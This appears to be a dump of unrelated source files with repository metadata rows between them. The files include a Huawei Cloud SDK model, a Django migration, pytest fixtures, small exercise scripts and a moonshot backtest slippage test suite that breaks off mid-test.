db=loadDbase()
for key in db:
print(key, '=>\n', db[key])
print(db['sue']['name'])
| [
"zhwenrong@sina.com"
] | zhwenrong@sina.com |
048e806cc70ff70663d75e5ce3c42d2c27bff113 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-organizations/huaweicloudsdkorganizations/v1/model/delete_policy_response.py | 88dddb590f321ee7c66d8f2afe81f37f6be70dba | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 2,431 | py | # coding: utf-8
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class DeletePolicyResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
}
attribute_map = {
}
def __init__(self):
"""DeletePolicyResponse
The model defined in huaweicloud sdk
"""
super(DeletePolicyResponse, self).__init__()
self.discriminator = None
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DeletePolicyResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
80904623674486b0b93747232379e3d88873ba80 | 8a73cde463081afd76427d5af1e6837bfa51cc47 | /harvester/core/migrations/0025_delete_old_resources.py | 77fb7080cd64397347c6dd06423d07ea64ccfdb9 | [
"MIT"
] | permissive | surfedushare/search-portal | 8af4103ec6464e255c5462c672b30f32cd70b4e1 | 63e30ad0399c193fcb686804062cedf3930a093c | refs/heads/acceptance | 2023-06-25T13:19:41.051801 | 2023-06-06T13:37:01 | 2023-06-06T13:37:01 | 254,373,874 | 2 | 1 | MIT | 2023-06-06T12:04:44 | 2020-04-09T13:07:12 | Python | UTF-8 | Python | false | false | 494 | py | # Generated by Django 3.2.8 on 2021-10-25 13:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0024_pdf_thumbnails'),
]
operations = [
migrations.RemoveField(
model_name='tikaresource',
name='retainer_type',
),
migrations.DeleteModel(
name='FileResource',
),
migrations.DeleteModel(
name='TikaResource',
),
]
| [
"email@fakoberkers.nl"
] | email@fakoberkers.nl |
69fd3114d948b6199a0cea0eb3d2011db1a66155 | 5eb52c07e5b1bd00af77306f927f382b684cd6ff | /indy_node/test/pool_config/conftest.py | d7be1101c2ac8cde5ad4580c819339cd86ec230f | [
"Apache-2.0"
] | permissive | hyperledger/indy-node | bce39486988f5114581cff4f6d14fc1b7684143c | e6bb87d4c605aff9914491d062248b6ec857334c | refs/heads/main | 2023-09-03T15:33:08.187153 | 2023-05-08T22:48:21 | 2023-05-08T22:48:21 | 77,021,566 | 691 | 783 | Apache-2.0 | 2023-05-09T15:42:43 | 2016-12-21T05:45:04 | Python | UTF-8 | Python | false | false | 812 | py | import pytest
from indy_node.test.pool_config.helper import sdk_ensure_pool_config_sent
def genPoolConfig(writes: bool, force: bool):
return dict(writes=writes, force=force)
@pytest.fixture(scope='module')
def poolConfigWTFF():
return genPoolConfig(writes=True, force=False)
@pytest.fixture(scope='module')
def poolConfigWFFF():
return genPoolConfig(writes=False, force=False)
@pytest.fixture(scope='module')
def poolConfigWTFT():
return genPoolConfig(writes=True, force=True)
@pytest.fixture(scope='module')
def poolConfigWFFT():
return genPoolConfig(writes=False, force=True)
@pytest.fixture(scope="module")
def poolConfigSent(looper, nodeSet, sdk_pool_handle, sdk_wallet_trustee, poolCfg):
sdk_ensure_pool_config_sent(looper, sdk_pool_handle, sdk_wallet_trustee, poolCfg)
| [
"alexander.sherbakov@dsr-company.com"
] | alexander.sherbakov@dsr-company.com |
6afe4beed95660164eed8effffbe691f3fba898e | fca336a7d3ac6e314179f47f72a33021eb9fcde2 | /python/20.py | b696b6cc527a3ba4eceb7c5cc26c3ac15db08d8a | [] | no_license | iamFIREcracker/project-euler | e84adfdcdcf2859f9fd2e57670110f5a7022f074 | 5dc50d9b1b41761b95e14a49e3ab9a80e4498657 | refs/heads/master | 2021-07-11T11:44:38.453475 | 2017-10-15T16:36:05 | 2017-10-15T16:36:05 | 107,029,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | """Find the sum of the digits in the number 100!
"""
import operator
print sum([int(c) for c in str(reduce(operator.mul,
[i for i in xrange(1, 101)]))])
| [
"matteo@matteolandi.net"
] | matteo@matteolandi.net |
2579e7e3a224013905d329e650e5d7ad7f25e4a0 | 2a54e8d6ed124c64abb9e075cc5524bb859ba0fa | /.history/1-Python-Basics/30-sets2_20200413205952.py | d79689b34bec2e0cad9ed29fe12bf8d7724c6d0d | [] | no_license | CaptainStorm21/Python-Foundation | 01b5fbaf7a913506518cf22e0339dd948e65cea1 | a385adeda74f43dd7fb2d99d326b0be23db25024 | refs/heads/master | 2021-05-23T01:29:18.885239 | 2020-04-23T19:18:06 | 2020-04-23T19:18:06 | 253,171,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 82 | py | # methods
my_set = { 1, 2, 3, 9, 10, 9}
your_set = [342,23,42,46,]
print(my_set)
| [
"tikana4@yahoo.com"
] | tikana4@yahoo.com |
7acbe3493e0d99d206cc053bfb28dc20de9e95a1 | bd435e3ff491d13c3cb1ffcf34771ac1c80f7859 | /code/base/test_module/package_runoob/runoob2.py | da3d36dcd4aa2bbe0c5d9f8242d047c8328d4dc4 | [] | no_license | luningcowboy/PythonTutorial | 8f4b6d16e0fad99a226540a6f12639ccdff402ff | 9024efe8ed22aca0a1271a2c1c388d3ffe1e6690 | refs/heads/master | 2021-06-16T23:03:22.153473 | 2020-04-09T13:52:12 | 2020-04-09T13:52:12 | 187,571,993 | 0 | 0 | null | 2021-03-25T23:02:36 | 2019-05-20T05:16:13 | Python | UTF-8 | Python | false | false | 35 | py | def runoob2():
print "runoob2"
| [
"luningcowboy@gmail.com"
] | luningcowboy@gmail.com |
863686b0bee3264e4df7e5fe6bc35b5bb19fd291 | c1655d6c6c11dafc1c7fa9f771b8e1f99cf7f123 | /venv/bin/results_schema | 15b83f64b98111511e0829dfbe16906db2994430 | [] | no_license | igorsowa9/vpp | a27520f19a54d7490534016ded9cd66f4ef5385b | ea91e3b2db921e7b1a450d243f39dbcf61231107 | refs/heads/master | 2021-04-30T03:28:56.642244 | 2019-09-16T09:01:49 | 2019-09-16T09:01:49 | 121,514,524 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 276 | #!/home/iso/PycharmProjects/vpp/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pyomo.scripting.commands import results_schema
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(results_schema())
| [
"iso@ubuntu.ubuntu-domain"
] | iso@ubuntu.ubuntu-domain | |
0010ddf6c6cc7080f556ea0f9f88f801902a9897 | 11d75881f729dc5e9ca08bfe6adae0fd64098056 | /dazzler/system/__init__.py | 13121628e6b1dffbb55124890f3bf3201073901a | [
"MIT"
] | permissive | jbampton/dazzler | b918723c4fd1f0015153247345156007581b0520 | 4018f6cbcb55a9f482cb5c5cbf6a06b063c15e21 | refs/heads/master | 2023-03-08T12:18:13.847188 | 2021-06-19T22:29:54 | 2021-06-20T13:23:18 | 218,608,116 | 1 | 0 | MIT | 2023-03-06T19:00:08 | 2019-10-30T19:38:15 | Python | UTF-8 | Python | false | false | 1,337 | py | """
Dazzler systems (API)
- Requirements are JS/CSS resources to include on rendering.
- Packages hold components info and it's requirements.
- Component Aspects are shared between backend and frontend with bindings.
- Generate components with ``dazzler generate metadata.json output_dir``
- Page holds meta data for rendering, requirements, routes, layout, bindings.
"""
from ._component import Component, Aspect # noqa: F401
from ._binding import * # noqa: F401, F403
from ._package import Package # noqa: F401
from ._requirements import ( # noqa: F401
Requirement,
RequirementWarning,
assets_to_requirements,
collect_requirements,
)
from ._generator import generate_components, generate_meta # noqa: F401
from ._undefined import UNDEFINED, Undefined # noqa: F401
from ._page import Page # noqa: F401
from ._middleware import Middleware # noqa: F401
from ._route import Route, RouteMethod # noqa: F401
__all__ = [ # noqa: F405
'Component',
'Aspect',
'BindingContext',
'Binding',
'Trigger',
'State',
'BoundAspect',
'Package',
'Requirement',
'RequirementWarning',
'assets_to_requirements',
'collect_requirements',
'generate_components',
'generate_meta',
'UNDEFINED',
'Undefined',
'Page',
'Middleware',
'Route',
'RouteMethod',
]
| [
"t4rk@outlook.com"
] | t4rk@outlook.com |
4e9c8e1528a41a397fcd5edc6922892c841935c6 | 37d2a09c274ce31f1e6f690c234c3447d4708d6a | /staicoin/cmds/units.py | d30bcc831278333eb79b7ac1af62fb23f2833875 | [
"Apache-2.0"
] | permissive | jzblanco/staicoin-blockchain | 60aedc566f475922e845ea019f2d8468f510a947 | 75a148429f6d39c36802c83b928ad8effbfc56a8 | refs/heads/main | 2023-08-17T13:11:46.094703 | 2021-10-08T23:13:49 | 2021-10-08T23:13:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 325 | py | from typing import Dict
# The rest of the codebase uses mojos everywhere.
# Only use these units for user facing interfaces.
units: Dict[str, int] = {
"staicoin": 10 ** 9, # 1 staicoin (stai) is 1,000,000,000 mojo (1 billion)
"mojo:": 1,
"colouredcoin": 10 ** 3, # 1 coloured coin is 1000 colouredcoin mojos
}
| [
"em@iguru.team"
] | em@iguru.team |
77bd0747f7d7fc145ab0b45eefafd6f638002f18 | 72ec201effe17c3875f3d26ab98d6e56f808b0ac | /aoomuki_comp/app/migrations/0047_auto_20210202_1646.py | ad2ed545f6323c217246556f94f308312325f1d1 | [
"MIT"
] | permissive | Kamelgasmi/aoomuki_competences | 549f9c9167f82d084ef6048cec72e87fe90f4c35 | e02f3546f7efb54b825dbcfab968296607775903 | refs/heads/master | 2023-04-06T17:48:35.921460 | 2021-04-16T08:49:15 | 2021-04-16T08:49:15 | 330,929,238 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 764 | py | # Generated by Django 3.1.5 on 2021-02-02 15:46
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('app', '0046_auto_20210202_1147'),
]
operations = [
migrations.RemoveField(
model_name='listofcompetence',
name='Collaborater',
),
migrations.AddField(
model_name='listofcompetence',
name='User',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Utilisateur'),
),
]
| [
"kam_7@hotmail.fr"
] | kam_7@hotmail.fr |
dfd731d95d35d7ba3ca64ab77bed8a8cf155b40b | 950884cea2a67bc2047c8a7c278d1cbf7f657b29 | /submits.2015/14_57_48_33_1_8767.py | ce10341e2c19add871a9204b5ab9e64b55c845fd | [] | no_license | lisiynos/loo2015 | ac5bd8d1d81c301be0e65960c3707506120f0b7f | cf3d12589c9e586921c2a38554103fc1c7652abe | refs/heads/master | 2020-12-25T17:35:50.917577 | 2016-08-29T09:31:40 | 2016-08-29T09:31:40 | 29,869,192 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | with open('hall.in', 'r') as infile:
a, b, c, d = [int(x) for x in infile.readline().split()]
hall_counter = 0
for x in range(1, b + 1):
for y in range(1, b + 1):
if c <= (x + y) * 2 <= d and a <= x * y <= b:
hall_counter += 1
hall_counter = str(int((hall_counter + 1)/2))
with open('hall.out', 'w') as outfile:
outfile.write(hall_counter) | [
"super.denis@gmail.com"
] | super.denis@gmail.com |
dbf7e015cf51dbbb14357fd117a4ad9c60957475 | 0202dff1bcf4d49195fbcd0656ee79f93115a7b9 | /tests/test_slippage.py | 00a82eb1222a53b25289a3fb564e29b77ae795b7 | [
"Apache-2.0"
] | permissive | TimPchelintsev/moonshot | f9637889753609c966a3320f89fd7585693d82fa | 08374bdb4fb24ec8c4c196aeed2b2bf757acffb3 | refs/heads/master | 2020-04-13T15:29:46.601080 | 2018-11-08T15:13:02 | 2018-11-08T15:13:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28,475 | py | # Copyright 2018 QuantRocket LLC - All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# To run: python3 -m unittest discover -s tests/ -p test_*.py -t . -v
import os
import unittest
from unittest.mock import patch
import glob
import pandas as pd
from moonshot import Moonshot
from moonshot.slippage import FixedSlippage
from moonshot.cache import TMP_DIR
class MoonshotSlippgeTestCase(unittest.TestCase):
"""
Test cases related to applying slippage in a backtest.
"""
def tearDown(self):
"""
Remove cached files.
"""
for file in glob.glob("{0}/moonshot*.pkl".format(TMP_DIR)):
os.remove(file)
def test_no_slippage(self):
"""
Tests that the resulting DataFrames are correct when no slippage is
applied.
"""
class BuyBelow10ShortAbove10(Moonshot):
"""
A basic test strategy that buys below 10 and shorts above 10.
"""
def prices_to_signals(self, prices):
long_signals = prices.loc["Close"] <= 10
short_signals = prices.loc["Close"] > 10
signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
return signals
def mock_get_historical_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-05-01","2018-05-02","2018-05-03", "2018-05-04"])
fields = ["Close","Volume"]
idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])
prices = pd.DataFrame(
{
12345: [
# Close
9,
11,
10.50,
9.99,
# Volume
5000,
16000,
8800,
9900
],
23456: [
# Close
9.89,
11,
8.50,
10.50,
# Volume
15000,
14000,
28800,
17000
],
},
index=idx
)
master_fields = ["Timezone"]
idx = pd.MultiIndex.from_product((master_fields, [dt_idx[0]]), names=["Field", "Date"])
securities = pd.DataFrame(
{
12345: [
"America/New_York"
],
23456: [
"America/New_York"
]
},
index=idx
)
return pd.concat((prices, securities))
with patch("moonshot.strategies.base.get_historical_prices", new=mock_get_historical_prices):
results = BuyBelow10ShortAbove10().backtest()
self.assertSetEqual(
set(results.index.get_level_values("Field")),
{'Commission',
'AbsExposure',
'Signal',
'Return',
'Slippage',
'NetExposure',
'Trade',
'AbsWeight',
'Weight'}
)
results = results.round(7)
results = results.where(results.notnull(), "nan")
signals = results.loc["Signal"].reset_index()
signals.loc[:, "Date"] = signals.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
signals.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: [1.0,
-1.0,
-1.0,
1.0],
23456: [1.0,
-1.0,
1.0,
-1.0]}
)
weights = results.loc["Weight"].reset_index()
weights.loc[:, "Date"] = weights.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
weights.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: [0.5,
-0.5,
-0.5,
0.5],
23456: [0.5,
-0.5,
0.5,
-0.5]}
)
net_exposures = results.loc["NetExposure"].reset_index()
net_exposures.loc[:, "Date"] = net_exposures.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
net_exposures.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: ["nan",
0.5,
-0.5,
-0.5],
23456: ["nan",
0.5,
-0.5,
0.5]}
)
trades = results.loc["Trade"].reset_index()
trades.loc[:, "Date"] = trades.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
trades.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: ["nan",
0.5,
-1.0,
0.0],
23456: ["nan",
0.5,
-1.0,
1.0]}
)
slippage = results.loc["Slippage"].reset_index()
slippage.loc[:, "Date"] = slippage.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
slippage.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: [0.0,
0.0,
0.0,
0.0],
23456: [0.0,
0.0,
0.0,
0.0]}
)
returns = results.loc["Return"]
returns = returns.reset_index()
returns.loc[:, "Date"] = returns.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
returns.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: [0.0,
0.0,
-0.0227273, # (10.50 - 11)/11 * 0.5
0.0242857], # (9.99 - 10.50)/10.50 * -0.5
23456: [0.0,
0.0,
-0.1136364, # (8.50 - 11)/11 * 0.5
-0.1176471] # (10.50 - 8.50)/8.50 * -0.5
}
)
def test_apply_slippage(self):
"""
Tests that the resulting DataFrames are correct when a single
slippage class is applied.
"""
class TestSlippage(FixedSlippage):
ONE_WAY_SLIPPAGE = 0.001 # 10 BPS
class BuyBelow10ShortAbove10(Moonshot):
"""
A basic test strategy that buys below 10 and shorts above 10.
"""
SLIPPAGE_CLASSES = TestSlippage
def prices_to_signals(self, prices):
long_signals = prices.loc["Close"] <= 10
short_signals = prices.loc["Close"] > 10
signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
return signals
def mock_get_historical_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-05-01","2018-05-02","2018-05-03", "2018-05-04"])
fields = ["Close","Volume"]
idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])
prices = pd.DataFrame(
{
12345: [
# Close
9,
11,
10.50,
9.99,
# Volume
5000,
16000,
8800,
9900
],
23456: [
# Close
9.89,
11,
8.50,
10.50,
# Volume
15000,
14000,
28800,
17000
],
},
index=idx
)
master_fields = ["Timezone"]
idx = pd.MultiIndex.from_product((master_fields, [dt_idx[0]]), names=["Field", "Date"])
securities = pd.DataFrame(
{
12345: [
"America/New_York"
],
23456: [
"America/New_York"
]
},
index=idx
)
return pd.concat((prices, securities))
with patch("moonshot.strategies.base.get_historical_prices", new=mock_get_historical_prices):
results = BuyBelow10ShortAbove10().backtest()
self.assertSetEqual(
set(results.index.get_level_values("Field")),
{'Commission',
'AbsExposure',
'Signal',
'Return',
'Slippage',
'NetExposure',
'Trade',
'AbsWeight',
'Weight'}
)
results = results.round(7)
results = results.where(results.notnull(), "nan")
signals = results.loc["Signal"].reset_index()
signals.loc[:, "Date"] = signals.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
signals.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: [1.0,
-1.0,
-1.0,
1.0],
23456: [1.0,
-1.0,
1.0,
-1.0]}
)
weights = results.loc["Weight"].reset_index()
weights.loc[:, "Date"] = weights.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
weights.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: [0.5,
-0.5,
-0.5,
0.5],
23456: [0.5,
-0.5,
0.5,
-0.5]}
)
net_exposures = results.loc["NetExposure"].reset_index()
net_exposures.loc[:, "Date"] = net_exposures.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
net_exposures.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: ["nan",
0.5,
-0.5,
-0.5],
23456: ["nan",
0.5,
-0.5,
0.5]}
)
trades = results.loc["Trade"].reset_index()
trades.loc[:, "Date"] = trades.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
trades.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: ["nan",
0.5,
-1.0,
0.0],
23456: ["nan",
0.5,
-1.0,
1.0]}
)
slippage = results.loc["Slippage"].reset_index()
slippage.loc[:, "Date"] = slippage.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
slippage.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: [0.0,
0.0005,
0.001,
0.0],
23456: [0.0,
0.0005,
0.001,
0.001]}
)
returns = results.loc["Return"]
returns = returns.reset_index()
returns.loc[:, "Date"] = returns.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
returns.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: [0.0,
-0.0005,
-0.0237273, # (10.50 - 11)/11 * 0.5 - 0.001
0.0242857], # (9.99 - 10.50)/10.50 * -0.5
23456: [0.0,
-0.0005,
-0.1146364, # (8.50 - 11)/11 * 0.5 - 0.001
-0.1186471] # (10.50 - 8.50)/8.50 * -0.5 - 0.001
}
)
def test_apply_SLIPPAGE_BPS(self):
"""
Tests that the resulting DataFrames are correct when SLIPPAGE_BPS is
applied.
"""
class BuyBelow10ShortAbove10(Moonshot):
"""
A basic test strategy that buys below 10 and shorts above 10.
"""
SLIPPAGE_BPS = 20
def prices_to_signals(self, prices):
long_signals = prices.loc["Close"] <= 10
short_signals = prices.loc["Close"] > 10
signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
return signals
def mock_get_historical_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-05-01","2018-05-02","2018-05-03", "2018-05-04"])
fields = ["Close","Volume"]
idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])
prices = pd.DataFrame(
{
12345: [
# Close
9,
11,
10.50,
9.99,
# Volume
5000,
16000,
8800,
9900
],
23456: [
# Close
9.89,
11,
8.50,
10.50,
# Volume
15000,
14000,
28800,
17000
],
},
index=idx
)
master_fields = ["Timezone"]
idx = pd.MultiIndex.from_product((master_fields, [dt_idx[0]]), names=["Field", "Date"])
securities = pd.DataFrame(
{
12345: [
"America/New_York"
],
23456: [
"America/New_York"
]
},
index=idx
)
return pd.concat((prices, securities))
with patch("moonshot.strategies.base.get_historical_prices", new=mock_get_historical_prices):
results = BuyBelow10ShortAbove10().backtest()
self.assertSetEqual(
set(results.index.get_level_values("Field")),
{'Commission',
'AbsExposure',
'Signal',
'Return',
'Slippage',
'NetExposure',
'Trade',
'AbsWeight',
'Weight'}
)
results = results.round(7)
results = results.where(results.notnull(), "nan")
signals = results.loc["Signal"].reset_index()
signals.loc[:, "Date"] = signals.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
signals.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: [1.0,
-1.0,
-1.0,
1.0],
23456: [1.0,
-1.0,
1.0,
-1.0]}
)
weights = results.loc["Weight"].reset_index()
weights.loc[:, "Date"] = weights.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
weights.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: [0.5,
-0.5,
-0.5,
0.5],
23456: [0.5,
-0.5,
0.5,
-0.5]}
)
net_exposures = results.loc["NetExposure"].reset_index()
net_exposures.loc[:, "Date"] = net_exposures.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
net_exposures.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: ["nan",
0.5,
-0.5,
-0.5],
23456: ["nan",
0.5,
-0.5,
0.5]}
)
trades = results.loc["Trade"].reset_index()
trades.loc[:, "Date"] = trades.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
trades.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: ["nan",
0.5,
-1.0,
0.0],
23456: ["nan",
0.5,
-1.0,
1.0]}
)
slippage = results.loc["Slippage"].reset_index()
slippage.loc[:, "Date"] = slippage.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
slippage.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: [0.0,
0.001,
0.002,
0.0],
23456: [0.0,
0.001,
0.002,
0.002]}
)
returns = results.loc["Return"]
returns = returns.reset_index()
returns.loc[:, "Date"] = returns.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
returns.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: [0.0,
-0.001,
-0.0247273, # (10.50 - 11)/11 * 0.5 - 0.002
0.0242857], # (9.99 - 10.50)/10.50 * -0.5
23456: [0.0,
-0.001,
-0.1156364, # (8.50 - 11)/11 * 0.5 - 0.002
-0.1196471] # (10.50 - 8.50)/8.50 * -0.5 - 0.002
}
)
def test_apply_mulitple_slippages(self):
"""
Tests that the resulting DataFrames are correct when multiple
slippage classes and SLIPPAGE_BPS are applied.
"""
class TestSlippage1(FixedSlippage):
ONE_WAY_SLIPPAGE = 0.003 # 30 BPS
class TestSlippage2(FixedSlippage):
ONE_WAY_SLIPPAGE = 0.002 # 20 BPS
class BuyBelow10ShortAbove10(Moonshot):
"""
A basic test strategy that buys below 10 and shorts above 10.
"""
SLIPPAGE_CLASSES = (TestSlippage1, TestSlippage2)
SLIPPAGE_BPS = 50
def prices_to_signals(self, prices):
long_signals = prices.loc["Close"] <= 10
short_signals = prices.loc["Close"] > 10
signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
return signals
def mock_get_historical_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-05-01","2018-05-02","2018-05-03", "2018-05-04"])
fields = ["Close","Volume"]
idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])
prices = pd.DataFrame(
{
12345: [
# Close
9,
11,
10.50,
9.99,
# Volume
5000,
16000,
8800,
9900
],
23456: [
# Close
9.89,
11,
8.50,
10.50,
# Volume
15000,
14000,
28800,
17000
],
},
index=idx
)
master_fields = ["Timezone"]
idx = pd.MultiIndex.from_product((master_fields, [dt_idx[0]]), names=["Field", "Date"])
securities = pd.DataFrame(
{
12345: [
"America/New_York"
],
23456: [
"America/New_York"
]
},
index=idx
)
return pd.concat((prices, securities))
with patch("moonshot.strategies.base.get_historical_prices", new=mock_get_historical_prices):
results = BuyBelow10ShortAbove10().backtest()
self.assertSetEqual(
set(results.index.get_level_values("Field")),
{'Commission',
'AbsExposure',
'Signal',
'Return',
'Slippage',
'NetExposure',
'Trade',
'AbsWeight',
'Weight'}
)
results = results.round(7)
results = results.where(results.notnull(), "nan")
signals = results.loc["Signal"].reset_index()
signals.loc[:, "Date"] = signals.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
signals.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: [1.0,
-1.0,
-1.0,
1.0],
23456: [1.0,
-1.0,
1.0,
-1.0]}
)
weights = results.loc["Weight"].reset_index()
weights.loc[:, "Date"] = weights.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
weights.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
